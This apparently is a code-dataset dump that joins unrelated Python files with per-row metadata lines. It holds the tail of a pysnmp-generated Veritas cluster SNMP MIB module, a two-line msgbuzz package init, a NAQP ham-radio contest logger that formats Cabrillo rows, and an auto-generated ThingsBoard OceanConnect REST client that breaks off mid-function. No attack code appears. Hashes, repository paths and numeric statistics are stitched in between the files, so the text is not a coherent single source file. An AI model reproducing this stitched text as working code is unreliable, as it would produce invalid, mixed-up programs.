clusterRDCResyncFailedTrap = NotificationType((1, 3, 6, 1, 4, 1, 1302, 3, 8, 10, 2, 10) + (0,8)).setObjects(("VERITAS-CLUSTER-MIB", "severityId"), ("VERITAS-CLUSTER-MIB", "eventTime"), ("VERITAS-CLUSTER-MIB", "entityName"), ("VERITAS-CLUSTER-MIB", "entityType"), ("VERITAS-CLUSTER-MIB", "entitySubType"), ("VERITAS-CLUSTER-MIB", "entityState"), ("VERITAS-CLUSTER-MIB", "trapOrigin"), ("VERITAS-CLUSTER-MIB", "systemName"), ("VERITAS-CLUSTER-MIB", "systemLocation"), ("VERITAS-CLUSTER-MIB", "entityContainerName"), ("VERITAS-CLUSTER-MIB", "entityContainerType"), ("VERITAS-CLUSTER-MIB", "entityOwner"), ("VERITAS-CLUSTER-MIB", "message"))
clusterRDCResyncSuccessTrap = NotificationType((1, 3, 6, 1, 4, 1, 1302, 3, 8, 10, 2, 10) + (0,9)).setObjects(("VERITAS-CLUSTER-MIB", "severityId"), ("VERITAS-CLUSTER-MIB", "eventTime"), ("VERITAS-CLUSTER-MIB", "entityName"), ("VERITAS-CLUSTER-MIB", "entityType"), ("VERITAS-CLUSTER-MIB", "entitySubType"), ("VERITAS-CLUSTER-MIB", "entityState"), ("VERITAS-CLUSTER-MIB", "trapOrigin"), ("VERITAS-CLUSTER-MIB", "systemName"), ("VERITAS-CLUSTER-MIB", "systemLocation"), ("VERITAS-CLUSTER-MIB", "entityContainerName"), ("VERITAS-CLUSTER-MIB", "entityContainerType"), ("VERITAS-CLUSTER-MIB", "entityOwner"), ("VERITAS-CLUSTER-MIB", "message"))
clusterRDCGroupOfflineTrap = NotificationType((1, 3, 6, 1, 4, 1, 1302, 3, 8, 10, 2, 10) + (0,10)).setObjects(("VERITAS-CLUSTER-MIB", "severityId"), ("VERITAS-CLUSTER-MIB", "eventTime"), ("VERITAS-CLUSTER-MIB", "entityName"), ("VERITAS-CLUSTER-MIB", "entityType"), ("VERITAS-CLUSTER-MIB", "entitySubType"), ("VERITAS-CLUSTER-MIB", "entityState"), ("VERITAS-CLUSTER-MIB", "trapOrigin"), ("VERITAS-CLUSTER-MIB", "systemName"), ("VERITAS-CLUSTER-MIB", "systemLocation"), ("VERITAS-CLUSTER-MIB", "entityContainerName"), ("VERITAS-CLUSTER-MIB", "entityContainerType"), ("VERITAS-CLUSTER-MIB", "entityOwner"), ("VERITAS-CLUSTER-MIB", "message"))
mibBuilder.exportSymbols("VERITAS-CLUSTER-MIB", clusterRDCGroupOfflineTrap=clusterRDCGroupOfflineTrap, clusterSystemJoinedClusterTrap=clusterSystemJoinedClusterTrap, clusterGroupOnlineTrap=clusterGroupOnlineTrap, clusterSystemUpButNotInClusterTrap=clusterSystemUpButNotInClusterTrap, clusterGroupInitiatingForSwitchingTrap=clusterGroupInitiatingForSwitchingTrap, message=message, clusterGroupAutoDisabledTrap=clusterGroupAutoDisabledTrap, clusterSystemRestartingByHashadowTrap=clusterSystemRestartingByHashadowTrap, clustertraps=clustertraps, clusterSystemUsageExceededThresholdTrap=clusterSystemUsageExceededThresholdTrap, clusterAgentFaultedTrap=clusterAgentFaultedTrap, veritasCluster=veritasCluster, gcmHeartbeatTraps=gcmHeartbeatTraps, clusterResourceRestartingByAgentTrap=clusterResourceRestartingByAgentTrap, clusterFirstSystemUpTrap=clusterFirstSystemUpTrap, entityState=entityState, vcsHeartbeatTraps=vcsHeartbeatTraps, clusterGroupRestartingTrap=clusterGroupRestartingTrap, systemLocation=systemLocation, clusterSystemInJeopardyTrap=clusterSystemInJeopardyTrap, products=products, groupsTraps=groupsTraps, clusterRDCMigrateSuccessTrap=clusterRDCMigrateSuccessTrap, gcmSiteTraps=gcmSiteTraps, resourcesTraps=resourcesTraps, clusterRDCActingSecondaryTrap=clusterRDCActingSecondaryTrap, clusterGUIUserLoginTrap=clusterGUIUserLoginTrap, entityType=entityType, clusterGroupFaultedAndNowhereToFailoverTrap=clusterGroupFaultedAndNowhereToFailoverTrap, PYSNMP_MODULE_ID=veritasCluster, clusterGroupRestInRspnToPerstResGoOnlineTrap=clusterGroupRestInRspnToPerstResGoOnlineTrap, systemName=systemName, clusterSystemExitedManuallyTrap=clusterSystemExitedManuallyTrap, clusterResourceWentOnlineByItselfTrap=clusterResourceWentOnlineByItselfTrap, systemsTraps=systemsTraps, entityOwner=entityOwner, clusterRDCTakeoverFailedTrap=clusterRDCTakeoverFailedTrap, clusterRDCResyncSuccessTrap=clusterRDCResyncSuccessTrap, clusterResourceNotGoingOfflineTrap=clusterResourceNotGoingOfflineTrap, agentsTraps=agentsTraps, entityName=entityName, peerSystemLocation=peerSystemLocation, clusterAgentRestartingTrap=clusterAgentRestartingTrap, clusterRDCRlinkInconsistentTrap=clusterRDCRlinkInconsistentTrap, clustertrapvars=clustertrapvars, externalTraps=externalTraps, eventTime=eventTime, clusterGroupConcurencyViolationTrap=clusterGroupConcurencyViolationTrap, severityId=severityId, clusterRDCResyncFailedTrap=clusterRDCResyncFailedTrap, trapOrigin=trapOrigin, entityContainerType=entityContainerType, rdcTraps=rdcTraps, entitySubType=entitySubType, clusterResourceMonitorTimeoutTrap=clusterResourceMonitorTimeoutTrap, clusterRDCMigrateFailedTrap=clusterRDCMigrateFailedTrap, entityContainerName=entityContainerName, clusterResourceStateUnknownTrap=clusterResourceStateUnknownTrap, veritassoftware=veritassoftware, clusterGroupFaultedTrap=clusterGroupFaultedTrap, clusterRDCTakeoverSuccessTrap=clusterRDCTakeoverSuccessTrap, peerSystemName=peerSystemName, clustertrapsGroups=clustertrapsGroups, clusterResourceFaultedTrap=clusterResourceFaultedTrap, clusterSystemFaultedTrap=clusterSystemFaultedTrap, clusterRDCRlinkNotUpToDateTrap=clusterRDCRlinkNotUpToDateTrap, clusterGroupOfflineTrap=clusterGroupOfflineTrap, vcsTraps=vcsTraps)
| 328.787879 | 3,217 | 0.727803 | 3,435 | 32,550 | 6.89607 | 0.055022 | 0.278369 | 0.338019 | 0.011314 | 0.751055 | 0.740966 | 0.740966 | 0.740966 | 0.739995 | 0.738475 | 0 | 0.041877 | 0.06682 | 32,550 | 98 | 3,218 | 332.142857 | 0.737975 | 0.0102 | 0 | 0 | 0 | 0 | 0.472073 | 0.001366 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.065934 | 0 | 0.065934 | 0 | 0 | 0 | 0 | null | 1 | 1 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
94306cc9ff26de33fef5807edc851246fd4527d6 | 69 | py | Python | msgbuzz/__init__.py | sihendra/msgbus | ac67be1211732def95581e541239eb1ab1e6c00d | [
"BSD-3-Clause"
] | 2 | 2020-03-23T09:14:00.000Z | 2020-04-17T03:55:24.000Z | msgbuzz/__init__.py | sihendra/msgbuzz | ac67be1211732def95581e541239eb1ab1e6c00d | [
"BSD-3-Clause"
] | null | null | null | msgbuzz/__init__.py | sihendra/msgbuzz | ac67be1211732def95581e541239eb1ab1e6c00d | [
"BSD-3-Clause"
] | null | null | null | from .generic import MessageBus
from .generic import ConsumerConfirm
| 23 | 36 | 0.855072 | 8 | 69 | 7.375 | 0.625 | 0.372881 | 0.576271 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.115942 | 69 | 2 | 37 | 34.5 | 0.967213 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
946fef83ed286e5659b4c0099f7966545eff1a50 | 2,890 | py | Python | contest/Contest_NAQP.py | dfannin/loggy | 9bb0eb7167966615666f1d15106dad72fcd8daa9 | [
"BSD-3-Clause"
] | 2 | 2017-01-28T17:54:33.000Z | 2017-05-13T11:46:18.000Z | contest/Contest_NAQP.py | dfannin/loggy | 9bb0eb7167966615666f1d15106dad72fcd8daa9 | [
"BSD-3-Clause"
] | null | null | null | contest/Contest_NAQP.py | dfannin/loggy | 9bb0eb7167966615666f1d15106dad72fcd8daa9 | [
"BSD-3-Clause"
] | null | null | null |
from . import Contest
class NAQP_SSB(Contest.Contest):
def __init__(self,config):
super(NAQP_SSB, self).__init__(config)
self.name = "NAQP-SSB"
self.description = "North American QSO Party - Single Side Band"
def _transform(self,row):
if row['mode'] == "SSB":
return row
else:
return []
def _checkmulti(self):
band = self.qso['band']
mode = self.qso['mode']
comment = self.qso['comment'].split(',')
qth = comment[2].upper()
bandmodeqth = band + " " + mode + " " + qth
if not bandmodeqth in self.multilist:
self.multilist[bandmodeqth] = 1
else:
self.multilist[bandmodeqth] += 1
def format_cabrillo_row(self):
if not self.qso:
return ''
freq = int( float(self.qso['freq']) * 1000.0 )
mode = self.qso['mode']
if ( mode == 'SSB' ):
mode = 'PH'
qso_date = self.qso['qso_date']
qso_date = qso_date[:4] + '-' + qso_date[4:6] + '-' + qso_date[6:]
comment = self.qso['comment'].split(',')
name = comment[1].upper()
qth = comment[2].upper()
return 'QSO: %5s %2s %s %s %-15s %-10s %-3s %-15s %-10s %-3s' % (freq, mode, qso_date, self.qso['time_on'] , self.config['default']['call'].upper(), self.config['contest']['name'].upper(), self.config['contest']['qth'].upper(), self.qso['call'], name, qth)
class NAQP_CW(Contest.Contest):
def __init__(self,config):
super(NAQP_CW, self).__init__(config)
self.name = "NAQP-CW"
self.description = "North American QSO Party - Continuous Wave"
def _transform(self,row):
if row['mode'] == "CW":
return row
else:
return []
def _checkmulti(self):
band = self.qso['band']
mode = self.qso['mode']
comment = self.qso['comment'].split(',')
qth = comment[2].upper()
bandmodeqth = band + " " + mode + " " + qth
if not bandmodeqth in self.multilist:
self.multilist[bandmodeqth] = 1
else:
self.multilist[bandmodeqth] += 1
def format_cabrillo_row(self):
if not self.qso:
return ''
freq = int( float(self.qso['freq']) * 1000.0 )
mode = self.qso['mode']
if ( mode == 'SSB' ):
mode = 'PH'
qso_date = self.qso['qso_date']
qso_date = qso_date[:4] + '-' + qso_date[4:6] + '-' + qso_date[6:]
comment = self.qso['comment'].split(',')
name = comment[1].upper()
qth = comment[2].upper()
return 'QSO: %5s %2s %s %s %-15s %-10s %-3s %-15s %-10s %-3s' % (freq, mode, qso_date, self.qso['time_on'] , self.config['default']['call'].upper(), self.config['contest']['name'].upper(), self.config['contest']['qth'].upper(), self.qso['call'], name, qth)
| 36.582278 | 264 | 0.535986 | 356 | 2,890 | 4.227528 | 0.171348 | 0.093023 | 0.029236 | 0.039867 | 0.944851 | 0.944851 | 0.862458 | 0.825249 | 0.772093 | 0.772093 | 0 | 0.025218 | 0.286505 | 2,890 | 78 | 265 | 37.051282 | 0.704656 | 0 | 0 | 0.835821 | 0 | 0.029851 | 0.138802 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.119403 | false | 0 | 0.014925 | 0 | 0.283582 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
ca4ffbe85585c61f0ca246cd2516197b32f1b9f7 | 34,967 | py | Python | tb_rest_client/api/api_pe/ocean_connect_integration_controller_api.py | maksonlee/python_tb_rest_client | a6cd17ef4de31f68c3226b7a9835292fbac4b1fa | [
"Apache-2.0"
] | 1 | 2021-07-19T10:09:04.000Z | 2021-07-19T10:09:04.000Z | tb_rest_client/api/api_pe/ocean_connect_integration_controller_api.py | moravcik94/python_tb_rest_client | 985361890cdf4ccce93d2b24905ad9003c8dfcaa | [
"Apache-2.0"
] | null | null | null | tb_rest_client/api/api_pe/ocean_connect_integration_controller_api.py | moravcik94/python_tb_rest_client | 985361890cdf4ccce93d2b24905ad9003c8dfcaa | [
"Apache-2.0"
] | null | null | null | # coding: utf-8
# Copyright 2020. ThingsBoard
# #
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# #
# http://www.apache.org/licenses/LICENSE-2.0
# #
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from tb_rest_client.api_client import ApiClient
class OceanConnectIntegrationControllerApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def process_request_using_delete(self, routing_key, msg, request_headers, **kwargs): # noqa: E501
"""processRequest # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api_pe.process_request_using_delete(routing_key, msg, request_headers, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str routing_key: routingKey (required)
:param str msg: msg (required)
:param object request_headers: requestHeaders (required)
:return: DeferredResultResponseEntity
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.process_request_using_delete_with_http_info(routing_key, msg, request_headers, **kwargs) # noqa: E501
else:
(data) = self.process_request_using_delete_with_http_info(routing_key, msg, request_headers, **kwargs) # noqa: E501
return data
def process_request_using_delete_with_http_info(self, routing_key, msg, request_headers, **kwargs): # noqa: E501
"""processRequest # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api_pe.process_request_using_delete_with_http_info(routing_key, msg, request_headers, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str routing_key: routingKey (required)
:param str msg: msg (required)
:param object request_headers: requestHeaders (required)
:return: DeferredResultResponseEntity
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['routing_key', 'msg', 'request_headers'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
params[key] = val
del params['kwargs']
# verify the required parameter 'routing_key' is set
if ('routing_key' not in params or
params['routing_key'] is None):
raise ValueError("Missing the required parameter `routing_key` when calling `process_request_using_delete`") # noqa: E501
# verify the required parameter 'msg' is set
if ('msg' not in params or
params['msg'] is None):
raise ValueError("Missing the required parameter `msg` when calling `process_request_using_delete`") # noqa: E501
# verify the required parameter 'request_headers' is set
if ('request_headers' not in params or
params['request_headers'] is None):
raise ValueError("Missing the required parameter `request_headers` when calling `process_request_using_delete`") # noqa: E501
collection_formats = {}
path_params = {}
if 'routing_key' in params:
path_params['routingKey'] = params['routing_key'] # noqa: E501
query_params = []
header_params = {}
if 'request_headers' in params:
header_params['requestHeaders'] = params['request_headers'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
if 'msg' in params:
body_params = params['msg']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['X-Authorization'] # noqa: E501
return self.api_client.call_api(
'/api/v1/integrations/oceanconnect/{routingKey}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='DeferredResultResponseEntity', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def process_request_using_get(self, routing_key, msg, request_headers, **kwargs): # noqa: E501
"""processRequest # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api_pe.process_request_using_get(routing_key, msg, request_headers, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str routing_key: routingKey (required)
:param str msg: msg (required)
:param object request_headers: requestHeaders (required)
:return: DeferredResultResponseEntity
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.process_request_using_get_with_http_info(routing_key, msg, request_headers, **kwargs) # noqa: E501
else:
(data) = self.process_request_using_get_with_http_info(routing_key, msg, request_headers, **kwargs) # noqa: E501
return data
def process_request_using_get_with_http_info(self, routing_key, msg, request_headers, **kwargs): # noqa: E501
"""processRequest # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api_pe.process_request_using_get_with_http_info(routing_key, msg, request_headers, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str routing_key: routingKey (required)
:param str msg: msg (required)
:param object request_headers: requestHeaders (required)
:return: DeferredResultResponseEntity
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['routing_key', 'msg', 'request_headers'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
params[key] = val
del params['kwargs']
# verify the required parameter 'routing_key' is set
if ('routing_key' not in params or
params['routing_key'] is None):
raise ValueError("Missing the required parameter `routing_key` when calling `process_request_using_get`") # noqa: E501
# verify the required parameter 'msg' is set
if ('msg' not in params or
params['msg'] is None):
raise ValueError("Missing the required parameter `msg` when calling `process_request_using_get`") # noqa: E501
# verify the required parameter 'request_headers' is set
if ('request_headers' not in params or
params['request_headers'] is None):
raise ValueError("Missing the required parameter `request_headers` when calling `process_request_using_get`") # noqa: E501
collection_formats = {}
path_params = {}
if 'routing_key' in params:
path_params['routingKey'] = params['routing_key'] # noqa: E501
query_params = []
header_params = {}
if 'request_headers' in params:
header_params['requestHeaders'] = params['request_headers'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
if 'msg' in params:
body_params = params['msg']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['X-Authorization'] # noqa: E501
return self.api_client.call_api(
'/api/v1/integrations/oceanconnect/{routingKey}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='DeferredResultResponseEntity', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def process_request_using_head(self, routing_key, msg, request_headers, **kwargs): # noqa: E501
"""processRequest # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api_pe.process_request_using_head(routing_key, msg, request_headers, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str routing_key: routingKey (required)
:param str msg: msg (required)
:param object request_headers: requestHeaders (required)
:return: DeferredResultResponseEntity
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.process_request_using_head_with_http_info(routing_key, msg, request_headers, **kwargs) # noqa: E501
else:
(data) = self.process_request_using_head_with_http_info(routing_key, msg, request_headers, **kwargs) # noqa: E501
return data
def process_request_using_head_with_http_info(self, routing_key, msg, request_headers, **kwargs): # noqa: E501
"""processRequest # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api_pe.process_request_using_head_with_http_info(routing_key, msg, request_headers, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str routing_key: routingKey (required)
:param str msg: msg (required)
:param object request_headers: requestHeaders (required)
:return: DeferredResultResponseEntity
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['routing_key', 'msg', 'request_headers'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
params[key] = val
del params['kwargs']
# verify the required parameter 'routing_key' is set
if ('routing_key' not in params or
params['routing_key'] is None):
raise ValueError("Missing the required parameter `routing_key` when calling `process_request_using_head`") # noqa: E501
# verify the required parameter 'msg' is set
if ('msg' not in params or
params['msg'] is None):
raise ValueError("Missing the required parameter `msg` when calling `process_request_using_head`") # noqa: E501
# verify the required parameter 'request_headers' is set
if ('request_headers' not in params or
params['request_headers'] is None):
raise ValueError("Missing the required parameter `request_headers` when calling `process_request_using_head`") # noqa: E501
collection_formats = {}
path_params = {}
if 'routing_key' in params:
path_params['routingKey'] = params['routing_key'] # noqa: E501
query_params = []
header_params = {}
if 'request_headers' in params:
header_params['requestHeaders'] = params['request_headers'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
if 'msg' in params:
body_params = params['msg']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['X-Authorization'] # noqa: E501
return self.api_client.call_api(
'/api/v1/integrations/oceanconnect/{routingKey}', 'HEAD',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='DeferredResultResponseEntity', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def process_request_using_options(self, routing_key, msg, request_headers, **kwargs): # noqa: E501
"""processRequest # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api_pe.process_request_using_options(routing_key, msg, request_headers, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str routing_key: routingKey (required)
:param str msg: msg (required)
:param object request_headers: requestHeaders (required)
:return: DeferredResultResponseEntity
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.process_request_using_options_with_http_info(routing_key, msg, request_headers, **kwargs) # noqa: E501
else:
(data) = self.process_request_using_options_with_http_info(routing_key, msg, request_headers, **kwargs) # noqa: E501
return data
def process_request_using_options_with_http_info(self, routing_key, msg, request_headers, **kwargs): # noqa: E501
"""processRequest # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api_pe.process_request_using_options_with_http_info(routing_key, msg, request_headers, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str routing_key: routingKey (required)
:param str msg: msg (required)
:param object request_headers: requestHeaders (required)
:return: DeferredResultResponseEntity
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['routing_key', 'msg', 'request_headers'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
params[key] = val
del params['kwargs']
# verify the required parameter 'routing_key' is set
if ('routing_key' not in params or
params['routing_key'] is None):
raise ValueError("Missing the required parameter `routing_key` when calling `process_request_using_options`") # noqa: E501
# verify the required parameter 'msg' is set
if ('msg' not in params or
params['msg'] is None):
raise ValueError("Missing the required parameter `msg` when calling `process_request_using_options`") # noqa: E501
# verify the required parameter 'request_headers' is set
if ('request_headers' not in params or
params['request_headers'] is None):
raise ValueError("Missing the required parameter `request_headers` when calling `process_request_using_options`") # noqa: E501
collection_formats = {}
path_params = {}
if 'routing_key' in params:
path_params['routingKey'] = params['routing_key'] # noqa: E501
query_params = []
header_params = {}
if 'request_headers' in params:
header_params['requestHeaders'] = params['request_headers'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
if 'msg' in params:
body_params = params['msg']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['X-Authorization'] # noqa: E501
return self.api_client.call_api(
'/api/v1/integrations/oceanconnect/{routingKey}', 'OPTIONS',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='DeferredResultResponseEntity', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def process_request_using_patch(self, routing_key, msg, request_headers, **kwargs): # noqa: E501
"""processRequest # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api_pe.process_request_using_patch(routing_key, msg, request_headers, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str routing_key: routingKey (required)
:param str msg: msg (required)
:param object request_headers: requestHeaders (required)
:return: DeferredResultResponseEntity
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.process_request_using_patch_with_http_info(routing_key, msg, request_headers, **kwargs) # noqa: E501
else:
(data) = self.process_request_using_patch_with_http_info(routing_key, msg, request_headers, **kwargs) # noqa: E501
return data
def process_request_using_patch_with_http_info(self, routing_key, msg, request_headers, **kwargs): # noqa: E501
"""processRequest # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api_pe.process_request_using_patch_with_http_info(routing_key, msg, request_headers, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str routing_key: routingKey (required)
:param str msg: msg (required)
:param object request_headers: requestHeaders (required)
:return: DeferredResultResponseEntity
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['routing_key', 'msg', 'request_headers'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
params[key] = val
del params['kwargs']
# verify the required parameter 'routing_key' is set
if ('routing_key' not in params or
params['routing_key'] is None):
raise ValueError("Missing the required parameter `routing_key` when calling `process_request_using_patch`") # noqa: E501
# verify the required parameter 'msg' is set
if ('msg' not in params or
params['msg'] is None):
raise ValueError("Missing the required parameter `msg` when calling `process_request_using_patch`") # noqa: E501
# verify the required parameter 'request_headers' is set
if ('request_headers' not in params or
params['request_headers'] is None):
raise ValueError("Missing the required parameter `request_headers` when calling `process_request_using_patch`") # noqa: E501
collection_formats = {}
path_params = {}
if 'routing_key' in params:
path_params['routingKey'] = params['routing_key'] # noqa: E501
query_params = []
header_params = {}
if 'request_headers' in params:
header_params['requestHeaders'] = params['request_headers'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
if 'msg' in params:
body_params = params['msg']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['X-Authorization'] # noqa: E501
return self.api_client.call_api(
'/api/v1/integrations/oceanconnect/{routingKey}', 'PATCH',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='DeferredResultResponseEntity', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def process_request_using_post4(self, routing_key, msg, request_headers, **kwargs): # noqa: E501
"""processRequest # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api_pe.process_request_using_post4(routing_key, msg, request_headers, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str routing_key: routingKey (required)
:param str msg: msg (required)
:param object request_headers: requestHeaders (required)
:return: DeferredResultResponseEntity
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.process_request_using_post4_with_http_info(routing_key, msg, request_headers, **kwargs) # noqa: E501
else:
(data) = self.process_request_using_post4_with_http_info(routing_key, msg, request_headers, **kwargs) # noqa: E501
return data
def process_request_using_post4_with_http_info(self, routing_key, msg, request_headers, **kwargs): # noqa: E501
"""processRequest # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api_pe.process_request_using_post4_with_http_info(routing_key, msg, request_headers, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str routing_key: routingKey (required)
:param str msg: msg (required)
:param object request_headers: requestHeaders (required)
:return: DeferredResultResponseEntity
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['routing_key', 'msg', 'request_headers'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
params[key] = val
del params['kwargs']
# verify the required parameter 'routing_key' is set
if ('routing_key' not in params or
params['routing_key'] is None):
